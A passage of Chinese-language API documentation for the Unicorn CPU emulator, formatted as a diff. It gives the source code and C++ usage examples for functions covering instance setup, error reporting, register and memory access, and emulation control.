UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: return true; +#endif +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: return true; +#endif +#ifdef UNICORN_HAS_MIPS + case UC_ARCH_MIPS: return true; +#endif +#ifdef UNICORN_HAS_PPC + case UC_ARCH_PPC: return true; +#endif +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: return true; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: return true; +#endif + /* 无效或禁用架构 */ + default: return false; + } +} +``` + +使用示例: + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" +using namespace std; + +int main() +{ + cout << "是否支持UC_ARCH_X86架构:" << uc_arch_supported(UC_ARCH_X86) << endl; + return 0; +} +``` + +输出: + +![image.png](API_Doc_Pic/NExsavSgu4yMbBQ.png) + + + +### uc_open + +```c +uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **uc); +``` + +创建新的Unicorn实例 + +``` +@arch: 架构类型 (UC_ARCH_*) +@mode: 硬件模式. 由 UC_MODE_* 组合 +@uc: 指向 uc_engine 的指针, 返回时更新 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **result) +{ + struct uc_struct *uc; + + if (arch < UC_ARCH_MAX) { + uc = calloc(1, sizeof(*uc)); //申请内存 + if (!uc) { + // 内存不足 + return UC_ERR_NOMEM; + } + + uc->errnum = UC_ERR_OK; + uc->arch = arch; + uc->mode = mode; + + // 初始化 + // uc->ram_list = { .blocks = QTAILQ_HEAD_INITIALIZER(ram_list.blocks) }; + uc->ram_list.blocks.tqh_first = NULL; + uc->ram_list.blocks.tqh_last = &(uc->ram_list.blocks.tqh_first); + + uc->memory_listeners.tqh_first = NULL; + uc->memory_listeners.tqh_last = &uc->memory_listeners.tqh_first; + + uc->address_spaces.tqh_first = NULL; + uc->address_spaces.tqh_last = &uc->address_spaces.tqh_first; + + switch(arch) { // 根据架构进行预处理 + default: + break; +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: + if ((mode & ~UC_MODE_M68K_MASK) || + !(mode & UC_MODE_BIG_ENDIAN)) { + free(uc); + return UC_ERR_MODE; + } + uc->init_arch = m68k_uc_init; + break; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: + if ((mode & ~UC_MODE_X86_MASK) || + 
(mode & UC_MODE_BIG_ENDIAN) || + !(mode & (UC_MODE_16|UC_MODE_32|UC_MODE_64))) { + free(uc); + return UC_ERR_MODE; + } + uc->init_arch = x86_uc_init; + break; +#endif +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: + if ((mode & ~UC_MODE_ARM_MASK)) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_BIG_ENDIAN) { + uc->init_arch = armeb_uc_init; + } else { + uc->init_arch = arm_uc_init; + } + + if (mode & UC_MODE_THUMB) + uc->thumb = 1; + break; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: + if (mode & ~UC_MODE_ARM_MASK) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_BIG_ENDIAN) { + uc->init_arch = arm64eb_uc_init; + } else { + uc->init_arch = arm64_uc_init; + } + break; +#endif + +#if defined(UNICORN_HAS_MIPS) || defined(UNICORN_HAS_MIPSEL) || defined(UNICORN_HAS_MIPS64) || defined(UNICORN_HAS_MIPS64EL) + case UC_ARCH_MIPS: + if ((mode & ~UC_MODE_MIPS_MASK) || + !(mode & (UC_MODE_MIPS32|UC_MODE_MIPS64))) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_BIG_ENDIAN) { +#ifdef UNICORN_HAS_MIPS + if (mode & UC_MODE_MIPS32) + uc->init_arch = mips_uc_init; +#endif +#ifdef UNICORN_HAS_MIPS64 + if (mode & UC_MODE_MIPS64) + uc->init_arch = mips64_uc_init; +#endif + } else { // 小端序 +#ifdef UNICORN_HAS_MIPSEL + if (mode & UC_MODE_MIPS32) + uc->init_arch = mipsel_uc_init; +#endif +#ifdef UNICORN_HAS_MIPS64EL + if (mode & UC_MODE_MIPS64) + uc->init_arch = mips64el_uc_init; +#endif + } + break; +#endif + +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: + if ((mode & ~UC_MODE_SPARC_MASK) || + !(mode & UC_MODE_BIG_ENDIAN) || + !(mode & (UC_MODE_SPARC32|UC_MODE_SPARC64))) { + free(uc); + return UC_ERR_MODE; + } + if (mode & UC_MODE_SPARC64) + uc->init_arch = sparc64_uc_init; + else + uc->init_arch = sparc_uc_init; + break; +#endif + } + + if (uc->init_arch == NULL) { + return UC_ERR_ARCH; + } + + if (machine_initialize(uc)) + return UC_ERR_RESOURCE; + + *result = uc; + + if (uc->reg_reset) + uc->reg_reset(uc); + + return UC_ERR_OK; + } else 
{ + return UC_ERR_ARCH; + } +} +``` + +**注意: uc_open会申请堆内存,使用完必须用uc_close释放,否则会发生泄露** + +使用示例: + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" +using namespace std; + +int main() +{ + uc_engine* uc; + uc_err err; + + //// 初始化 X86-32bit 模式模拟器 + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + + if (!err) + cout << "uc引擎创建成功" << endl; + + //// 关闭uc + err = uc_close(uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_close() with error returned: %u\n", err); + return -1; + } + + if (!err) + cout << "uc引擎关闭成功" << endl; + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/dqKBwAWUL7XvypE.png) + + + +### uc_close + +```c +uc_err uc_close(uc_engine *uc); +``` + +关闭一个uc实例,将释放内存。关闭后无法恢复。 + +``` +@uc: 指向由 uc_open() 返回的指针 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_close(uc_engine *uc) +{ + int i; + struct list_item *cur; + struct hook *hook; + + // 清理内部数据 + if (uc->release) + uc->release(uc->tcg_ctx); + g_free(uc->tcg_ctx); + + // 清理 CPU. + g_free(uc->cpu->tcg_as_listener); + g_free(uc->cpu->thread); + + // 清理所有 objects. 
+ OBJECT(uc->machine_state->accelerator)->ref = 1; + OBJECT(uc->machine_state)->ref = 1; + OBJECT(uc->owner)->ref = 1; + OBJECT(uc->root)->ref = 1; + + object_unref(uc, OBJECT(uc->machine_state->accelerator)); + object_unref(uc, OBJECT(uc->machine_state)); + object_unref(uc, OBJECT(uc->cpu)); + object_unref(uc, OBJECT(&uc->io_mem_notdirty)); + object_unref(uc, OBJECT(&uc->io_mem_unassigned)); + object_unref(uc, OBJECT(&uc->io_mem_rom)); + object_unref(uc, OBJECT(uc->root)); + + // 释放内存 + g_free(uc->system_memory); + + // 释放相关线程 + if (uc->qemu_thread_data) + g_free(uc->qemu_thread_data); + + // 释放其他数据 + free(uc->l1_map); + + if (uc->bounce.buffer) { + free(uc->bounce.buffer); + } + + g_hash_table_foreach(uc->type_table, free_table, uc); + g_hash_table_destroy(uc->type_table); + + for (i = 0; i < DIRTY_MEMORY_NUM; i++) { + free(uc->ram_list.dirty_memory[i]); + } + + // 释放hook和hook列表 + for (i = 0; i < UC_HOOK_MAX; i++) { + cur = uc->hook[i].head; + // hook 可存在于多个列表,可通过计数获取释放的时间 + while (cur) { + hook = (struct hook *)cur->data; + if (--hook->refs == 0) { + free(hook); + } + cur = cur->next; + } + list_clear(&uc->hook[i]); + } + + free(uc->mapped_blocks); + + // 最后释放uc自身 + memset(uc, 0, sizeof(*uc)); + free(uc); + + return UC_ERR_OK; +} +``` + +使用实例同uc_open() + + + +### uc_query + +```c +uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result); +``` + +查询引擎的内部状态 + +``` + @uc: uc_open() 返回的句柄 + @type: uc_query_type 中枚举的类型 + + @result: 保存被查询的内部状态的指针 + + @return: 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result) +{ + if (type == UC_QUERY_PAGE_SIZE) { + *result = uc->target_page_size; + return UC_ERR_OK; + } + + if (type == UC_QUERY_ARCH) { + *result = uc->arch; + return UC_ERR_OK; + } + + switch(uc->arch) { +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: + return uc->query(uc, type, result); +#endif + default: + return UC_ERR_ARG; + } + + return UC_ERR_OK; +} +``` + +使用示例: + +```cpp 
+#include <iostream> +#include "unicorn/unicorn.h" +using namespace std; +int main() +{ + uc_engine* uc; + uc_err err; + + //// Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + if (!err) + cout << "uc实例创建成功" << endl; + + size_t result[] = {0}; + err = uc_query(uc, UC_QUERY_ARCH, result); // 查询架构 + if (!err) + cout << "查询成功: " << *result << endl; + + err = uc_close(uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_close() with error returned: %u\n", err); + return -1; + } + if (!err) + cout << "uc实例关闭成功" << endl; + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/ZtRKvUoaPTlshJ4.png) + +架构查询结果为4,对应的正是UC_ARCH_X86 + + + +### uc_errno + +```c +uc_err uc_errno(uc_engine *uc); +``` + +当某个API函数失败时,报告最后的错误号,一旦被访问,uc_errno可能不会保留原来的值。 + +``` +@uc: uc_open() 返回的句柄 + +@return: 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_errno(uc_engine *uc) +{ + return uc->errnum; +} +``` + +使用示例: + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" +using namespace std; + +int main() +{ + uc_engine* uc; + uc_err err; + + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + if (!err) + cout << "uc实例创建成功" << endl; + + err = uc_errno(uc); + cout << "错误号: " << err << endl; + + err = uc_close(uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_close() with error returned: %u\n", err); + return -1; + } + if (!err) + cout << "uc实例关闭成功" << endl; + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/IZhyWrGebA5tT4i.png) + +无错误,输出错误号为0 + + + +### uc_strerror + +```c +const char *uc_strerror(uc_err code); +``` + +返回给定错误号的解释 + +``` + @code: 错误号 + + @return: 指向给定错误号的解释的字符串指针 +``` + +源码实现 + +```cpp +const char *uc_strerror(uc_err code) +{ + switch(code) { + default: + return "Unknown error code"; + case UC_ERR_OK: + 
return "OK (UC_ERR_OK)"; + case UC_ERR_NOMEM: + return "No memory available or memory not present (UC_ERR_NOMEM)"; + case UC_ERR_ARCH: + return "Invalid/unsupported architecture (UC_ERR_ARCH)"; + case UC_ERR_HANDLE: + return "Invalid handle (UC_ERR_HANDLE)"; + case UC_ERR_MODE: + return "Invalid mode (UC_ERR_MODE)"; + case UC_ERR_VERSION: + return "Different API version between core & binding (UC_ERR_VERSION)"; + case UC_ERR_READ_UNMAPPED: + return "Invalid memory read (UC_ERR_READ_UNMAPPED)"; + case UC_ERR_WRITE_UNMAPPED: + return "Invalid memory write (UC_ERR_WRITE_UNMAPPED)"; + case UC_ERR_FETCH_UNMAPPED: + return "Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)"; + case UC_ERR_HOOK: + return "Invalid hook type (UC_ERR_HOOK)"; + case UC_ERR_INSN_INVALID: + return "Invalid instruction (UC_ERR_INSN_INVALID)"; + case UC_ERR_MAP: + return "Invalid memory mapping (UC_ERR_MAP)"; + case UC_ERR_WRITE_PROT: + return "Write to write-protected memory (UC_ERR_WRITE_PROT)"; + case UC_ERR_READ_PROT: + return "Read from non-readable memory (UC_ERR_READ_PROT)"; + case UC_ERR_FETCH_PROT: + return "Fetch from non-executable memory (UC_ERR_FETCH_PROT)"; + case UC_ERR_ARG: + return "Invalid argument (UC_ERR_ARG)"; + case UC_ERR_READ_UNALIGNED: + return "Read from unaligned memory (UC_ERR_READ_UNALIGNED)"; + case UC_ERR_WRITE_UNALIGNED: + return "Write to unaligned memory (UC_ERR_WRITE_UNALIGNED)"; + case UC_ERR_FETCH_UNALIGNED: + return "Fetch from unaligned memory (UC_ERR_FETCH_UNALIGNED)"; + case UC_ERR_RESOURCE: + return "Insufficient resource (UC_ERR_RESOURCE)"; + case UC_ERR_EXCEPTION: + return "Unhandled CPU exception (UC_ERR_EXCEPTION)"; + case UC_ERR_TIMEOUT: + return "Emulation timed out (UC_ERR_TIMEOUT)"; + } +} +``` + +使用示例: + +```cpp +#include <iostream> +#include "unicorn/unicorn.h" +using namespace std; + +int main() +{ + uc_engine* uc; + uc_err err; + + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error 
returned: %u\n", err);
+        return -1;
+    }
+    if (!err)
+        cout << "uc实例创建成功" << endl;
+
+    err = uc_errno(uc);
+    cout << "错误号: " << err << " 错误描述: " << uc_strerror(err) <<endl;
+
+    err = uc_close(uc);
+    if (err != UC_ERR_OK) {
+        printf("Failed on uc_close() with error returned: %u\n", err);
+        return -1;
+    }
+    if (!err)
+        cout << "uc实例关闭成功" << endl;
+
+    return 0;
+}
+```
+
+输出
+
+![image.png](API_Doc_Pic/MbZk8KjQFqJOxmd.png)
+
+
+
+### uc_reg_write
+
+```c
+uc_err uc_reg_write(uc_engine *uc, int regid, const void *value);
+```
+
+将值写入寄存器
+
+```
+@uc: uc_open()返回的句柄
+@regid: 将被修改的寄存器ID
+@value: 指向寄存器将被修改成的值的指针
+
+@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型
+```
+
+源码实现
+
+```c
+uc_err uc_reg_write(uc_engine *uc, int regid, const void *value)
+{
+    return uc_reg_write_batch(uc, &regid, (void *const *)&value, 1);
+}
+
+uc_err uc_reg_write_batch(uc_engine *uc, int *ids, void *const *vals, int count)
+{
+    int ret = UC_ERR_OK;
+    if (uc->reg_write)
+        ret = uc->reg_write(uc, (unsigned int *)ids, vals, count); //结构体中写入
+    else
+        return UC_ERR_EXCEPTION;
+
+    return ret;
+}
+```
+
+使用示例:
+
+```cpp
+#include <iostream>
+#include "unicorn/unicorn.h"
+using namespace std;
+
+int main()
+{
+    uc_engine* uc;
+    uc_err err;
+
+    err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
+    if (err != UC_ERR_OK) {
+        printf("Failed on uc_open() with error returned: %u\n", err);
+        return -1;
+    }
+    if (!err)
+        cout << "uc实例创建成功" << endl;
+
+    int r_eax = 0x12;
+    err = uc_reg_write(uc, UC_X86_REG_ECX, &r_eax);
+    if (!err)
+        cout << "写入成功: " << r_eax << endl;
+
+    err = uc_close(uc);
+    if (err != UC_ERR_OK) {
+        printf("Failed on uc_close() with error returned: %u\n", err);
+        return -1;
+    }
+    if (!err)
+        cout << "uc实例关闭成功" << endl;
+
+    return 0;
+}
+```
+
+输出
+
+![image.png](API_Doc_Pic/DkztJcigHCdmnRp.png)
+
+
+
+### uc_reg_read
+
+```c
+uc_err uc_reg_read(uc_engine *uc, int regid, void *value);
+```
+
+读取寄存器的值
+
+```
+@uc: uc_open()返回的句柄
+@regid: 将被读取的寄存器ID
+@value: 指向保存寄存器值的指针
+
+@return 成功则返回UC_ERR_OK , 否则返回 
uc_err 枚举的其他错误类型
+```
+
+源码实现
+
+```c
+uc_err uc_reg_read(uc_engine *uc, int regid, void *value)
+{
+    return uc_reg_read_batch(uc, &regid, &value, 1);
+}
+
+uc_err uc_reg_read_batch(uc_engine *uc, int *ids, void **vals, int count)
+{
+    if (uc->reg_read)
+        uc->reg_read(uc, (unsigned int *)ids, vals, count);
+    else
+        return -1;
+
+    return UC_ERR_OK;
+}
+```
+
+使用示例:
+
+```cpp
+#include <iostream>
+#include "unicorn/unicorn.h"
+using namespace std;
+
+int main()
+{
+    uc_engine* uc;
+    uc_err err;
+
+    err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc);
+    if (err != UC_ERR_OK) {
+        printf("Failed on uc_open() with error returned: %u\n", err);
+        return -1;
+    }
+    if (!err)
+        cout << "uc实例创建成功" << endl;
+
+    int r_eax = 0x12;
+    err = uc_reg_write(uc, UC_X86_REG_ECX, &r_eax);
+    if (!err)
+        cout << "写入成功: " << r_eax << endl;
+
+    int recv_eax;
+    err = uc_reg_read(uc, UC_X86_REG_ECX, &recv_eax);
+    if (!err)
+        cout << "读取成功: " << recv_eax << endl;
+
+    err = uc_close(uc);
+    if (err != UC_ERR_OK) {
+        printf("Failed on uc_close() with error returned: %u\n", err);
+        return -1;
+    }
+    if (!err)
+        cout << "uc实例关闭成功" << endl;
+
+    return 0;
+}
+```
+
+输出
+
+![image.png](API_Doc_Pic/ABkexFCfphu3zIg.png)
+
+
+
+### uc_reg_write_batch
+
+```c
+uc_err uc_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count);
+```
+
+同时将多个值写入多个寄存器
+
+```
+@uc: uc_open()返回的句柄
+@regid: 存储将被写入的多个寄存器ID的数组
+@value: 指向保存多个值的数组的指针
+@count: *regs 和 *vals 数组的长度
+
+@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型
+```
+
+源码实现
+
+```c
+uc_err uc_reg_write_batch(uc_engine *uc, int *ids, void *const *vals, int count)
+{
+    int ret = UC_ERR_OK;
+    if (uc->reg_write)
+        ret = uc->reg_write(uc, (unsigned int *)ids, vals, count);
+    else
+        return UC_ERR_EXCEPTION;
+
+    return ret;
+}
+```
+
+使用示例:
+
+```cpp
+#include <iostream>
+#include <string>
+#include "unicorn/unicorn.h"
+using namespace std;
+
+int syscall_abi[] = {
+    UC_X86_REG_RAX, UC_X86_REG_RDI, UC_X86_REG_RSI, UC_X86_REG_RDX,
+    UC_X86_REG_R10, UC_X86_REG_R8, 
UC_X86_REG_R9 +}; + +uint64_t vals[7] = { 200, 10, 11, 12, 13, 14, 15 }; + +void* ptrs[7]; + +int main() +{ + int i; + uc_err err; + uc_engine* uc; + + // set up register pointers + for (i = 0; i < 7; i++) { + ptrs[i] = &vals[i]; + } + + if ((err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc))) { + uc_perror("uc_open", err); + return 1; + } + + // reg_write_batch + printf("reg_write_batch({200, 10, 11, 12, 13, 14, 15})\n"); + if ((err = uc_reg_write_batch(uc, syscall_abi, ptrs, 7))) { + uc_perror("uc_reg_write_batch", err); + return 1; + } + + // reg_read_batch + memset(vals, 0, sizeof(vals)); + if ((err = uc_reg_read_batch(uc, syscall_abi, ptrs, 7))) { + uc_perror("uc_reg_read_batch", err); + return 1; + } + + printf("reg_read_batch = {"); + + for (i = 0; i < 7; i++) { + if (i != 0) printf(", "); + printf("%" PRIu64, vals[i]); + } + + printf("}\n"); + + uint64_t var[7] = { 0 }; + for (int i = 0; i < 7; i++) + { + cout << syscall_abi[i] << " "; + printf("%" PRIu64, vals[i]); + cout << endl; + } + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/l1AhdxgKE2U3tZB.png) + + + +### uc_reg_read_batch + +```c +uc_err uc_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count); +``` + +同时读取多个寄存器的值。 + +``` +@uc: uc_open()返回的句柄 +@regid: 存储将被读取的多个寄存器ID的数组 +@value: 指向保存多个值的数组的指针 +@count: *regs 和 *vals 数组的长度 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_reg_read_batch(uc_engine *uc, int *ids, void **vals, int count) +{ + if (uc->reg_read) + uc->reg_read(uc, (unsigned int *)ids, vals, count); + else + return -1; + + return UC_ERR_OK; +} +``` + +使用示例同uc_reg_write_batch()。 + + + +### uc_mem_write + +```c +uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *bytes, size_t size); +``` + +在内存中写入一段字节码。 + +``` + @uc: uc_open() 返回的句柄 + @address: 写入字节的起始地址 + @bytes: 指向一个包含要写入内存的数据的指针 + @size: 要写入的内存大小。 + + 注意: @bytes 必须足够大以包含 @size 字节。 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_mem_write(uc_engine 
*uc, uint64_t address, const void *_bytes, size_t size) +{ + size_t count = 0, len; + const uint8_t *bytes = _bytes; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + if (!check_mem_area(uc, address, size)) + return UC_ERR_WRITE_UNMAPPED; + + // 内存区域可以重叠相邻的内存块 + while(count < size) { + MemoryRegion *mr = memory_mapping(uc, address); + if (mr) { + uint32_t operms = mr->perms; + if (!(operms & UC_PROT_WRITE)) // 没有写保护 + // 标记为可写 + uc->readonly_mem(mr, false); + + len = (size_t)MIN(size - count, mr->end - address); + if (uc->write_mem(&uc->as, address, bytes, len) == false) + break; + + if (!(operms & UC_PROT_WRITE)) // 没有写保护 + // 设置写保护 + uc->readonly_mem(mr, true); + + count += len; + address += len; + bytes += len; + } else // 此地址尚未被映射 + break; + } + + if (count == size) + return UC_ERR_OK; + else + return UC_ERR_WRITE_UNMAPPED; +} +``` + +使用示例: + +```cpp +#include <iostream> +#include <string> +#include "unicorn/unicorn.h" +using namespace std; + +#define X86_CODE32 "\x41\x4a" // INC ecx; DEC edx +#define ADDRESS 0x1000 + +int main() +{ + uc_engine* uc; + uc_err err; + + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + + if (uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1)) { + printf("Failed to write emulation code to memory, quit!\n"); + return -1; + } + + uint32_t code; + + if(uc_mem_read(uc,ADDRESS,&code, sizeof(code))) { + printf("Failed to read emulation code to memory, quit!\n"); + return -1; + } + + cout << hex << code << endl; + + err = uc_close(uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_close() with error returned: %u\n", err); + return -1; + } + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/l4HhgDzcJIVvFNU.png) + + + +### uc_mem_read + +```c +uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size); +``` + +从内存中读取字节。 + 
+``` + @uc: uc_open() 返回的句柄 + @address: 读取字节的起始地址 + @bytes: 指向一个包含要读取内存的数据的指针 + @size: 要读取的内存大小。 + + 注意: @bytes 必须足够大以包含 @size 字节。 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *_bytes, size_t size) +{ + size_t count = 0, len; + uint8_t *bytes = _bytes; + + if (uc->mem_redirect) { + address = uc->mem_redirect(address); + } + + if (!check_mem_area(uc, address, size)) + return UC_ERR_READ_UNMAPPED; + + // 内存区域可以重叠相邻的内存块 + while(count < size) { + MemoryRegion *mr = memory_mapping(uc, address); + if (mr) { + len = (size_t)MIN(size - count, mr->end - address); + if (uc->read_mem(&uc->as, address, bytes, len) == false) + break; + count += len; + address += len; + bytes += len; + } else // 此地址尚未被映射 + break; + } + + if (count == size) + return UC_ERR_OK; + else + return UC_ERR_READ_UNMAPPED; +} +``` + +使用示例同uc_mem_write() + + + +### uc_emu_start + +```c +uc_err uc_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count); +``` + +在指定的时间内模拟机器码。 + +``` +@uc: uc_open() 返回的句柄 +@begin: 开始模拟的地址 +@until: 模拟停止的地址 (当到达该地址时) +@timeout: 模拟代码的持续时间(以微秒计)。当这个值为0时,将在无限时间内模拟代码,直到代码完成。 +@count: 要模拟的指令数。当这个值为0时,将模拟所有可用的代码,直到代码完成 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_emu_start(uc_engine* uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count) +{ + // 重制计数器 + uc->emu_counter = 0; + uc->invalid_error = UC_ERR_OK; + uc->block_full = false; + uc->emulation_done = false; + uc->timed_out = false; + + switch(uc->arch) { + default: + break; +#ifdef UNICORN_HAS_M68K + case UC_ARCH_M68K: + uc_reg_write(uc, UC_M68K_REG_PC, &begin); + break; +#endif +#ifdef UNICORN_HAS_X86 + case UC_ARCH_X86: + switch(uc->mode) { + default: + break; + case UC_MODE_16: { + uint64_t ip; + uint16_t cs; + + uc_reg_read(uc, UC_X86_REG_CS, &cs); + // 抵消后面增加的 IP 和 CS + ip = begin - cs*16; + uc_reg_write(uc, UC_X86_REG_IP, &ip); + break; + } + case UC_MODE_32: 
+ uc_reg_write(uc, UC_X86_REG_EIP, &begin); + break; + case UC_MODE_64: + uc_reg_write(uc, UC_X86_REG_RIP, &begin); + break; + } + break; +#endif +#ifdef UNICORN_HAS_ARM + case UC_ARCH_ARM: + uc_reg_write(uc, UC_ARM_REG_R15, &begin); + break; +#endif +#ifdef UNICORN_HAS_ARM64 + case UC_ARCH_ARM64: + uc_reg_write(uc, UC_ARM64_REG_PC, &begin); + break; +#endif +#ifdef UNICORN_HAS_MIPS + case UC_ARCH_MIPS: + // TODO: MIPS32/MIPS64/BIGENDIAN etc + uc_reg_write(uc, UC_MIPS_REG_PC, &begin); + break; +#endif +#ifdef UNICORN_HAS_SPARC + case UC_ARCH_SPARC: + // TODO: Sparc/Sparc64 + uc_reg_write(uc, UC_SPARC_REG_PC, &begin); + break; +#endif + } + + uc->stop_request = false; + + uc->emu_count = count; + // 如果不需要计数,则移除计数挂钩hook + if (count <= 0 && uc->count_hook != 0) { + uc_hook_del(uc, uc->count_hook); + uc->count_hook = 0; + } + // 设置计数hook记录指令数 + if (count > 0 && uc->count_hook == 0) { + uc_err err; + // 对计数指令的回调必须在所有其他操作之前运行,因此必须在hook列表的开头插入hook,而不是附加hook + uc->hook_insert = 1; + err = uc_hook_add(uc, &uc->count_hook, UC_HOOK_CODE, hook_count_cb, NULL, 1, 0); + // 恢复到 uc_hook_add() + uc->hook_insert = 0; + if (err != UC_ERR_OK) { + return err; + } + } + + uc->addr_end = until; + + if (timeout) + enable_emu_timer(uc, timeout * 1000); // microseconds -> nanoseconds + + if (uc->vm_start(uc)) { + return UC_ERR_RESOURCE; + } + + // 模拟完成 + uc->emulation_done = true; + + if (timeout) { + // 等待超时 + qemu_thread_join(&uc->timer); + } + + if(uc->timed_out) + return UC_ERR_TIMEOUT; + + return uc->invalid_error; +} +``` + +使用示例: + +```cpp +#include <iostream> +#include <string> +#include "unicorn/unicorn.h" +using namespace std; + +#define X86_CODE32 "\x33\xC0" // xor eax, eax +#define ADDRESS 0x1000 + +int main() +{ + uc_engine* uc; + uc_err err; + + int r_eax = 0x111; + + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + return -1; + } + + uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); + 
+ if (uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1)) { + printf("Failed to write emulation code to memory, quit!\n"); + return -1; + } + + uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); + printf(">>> before EAX = 0x%x\n", r_eax); + + err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); + if (err) { + printf("Failed on uc_emu_start() with error returned %u: %s\n", + err, uc_strerror(err)); + } + + uc_reg_read(uc, UC_X86_REG_EAX, &r_eax); + printf(">>> after EAX = 0x%x\n", r_eax); + + err = uc_close(uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_close() with error returned: %u\n", err); + return -1; + } + + return 0; +} +``` + +输出 + +![image.png](API_Doc_Pic/K4HMijIVt6lofvT.png) + + + +### uc_emu_stop + +```c +uc_err uc_emu_stop(uc_engine *uc); +``` + +停止模拟 + +通常是从通过 tracing API注册的回调函数中调用。 + +``` +@uc: uc_open() 返回的句柄 + +@return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_emu_stop(uc_engine *uc) +{ + if (uc->emulation_done) + return UC_ERR_OK; + + uc->stop_request = true; + + if (uc->current_cpu) { + // 退出当前线程 + cpu_exit(uc->current_cpu); + } + + return UC_ERR_OK; +} +``` + +使用示例: + +```cpp +uc_emu_stop(uc); +``` + + + +### uc_hook_add + +```c +uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, + void *user_data, uint64_t begin, uint64_t end, ...); +``` + +注册hook事件的回调,当hook事件被触发将会进行回调。 + +``` + @uc: uc_open() 返回的句柄 + @hh: 注册hook得到的句柄. uc_hook_del() 中使用 + @type: hook 类型 + @callback: 当指令被命中时要运行的回调 + @user_data: 用户自定义数据. 将被传递给回调函数的最后一个参数 @user_data + @begin: 回调生效区域的起始地址(包括) + @end: 回调生效区域的结束地址(包括) + 注意 1: 只有回调的地址在[@begin, @end]中才会调用回调 + 注意 2: 如果 @begin > @end, 每当触发此hook类型时都会调用回调 + @...: 变量参数 (取决于 @type) + 注意: 如果 @type = UC_HOOK_INSN, 这里是指令ID (如: UC_X86_INS_OUT) + + @return 成功则返回UC_ERR_OK , 否则返回 uc_err 枚举的其他错误类型 +``` + +源码实现 + +```c +uc_err uc_hook_add(uc_engine *uc, uc_hook 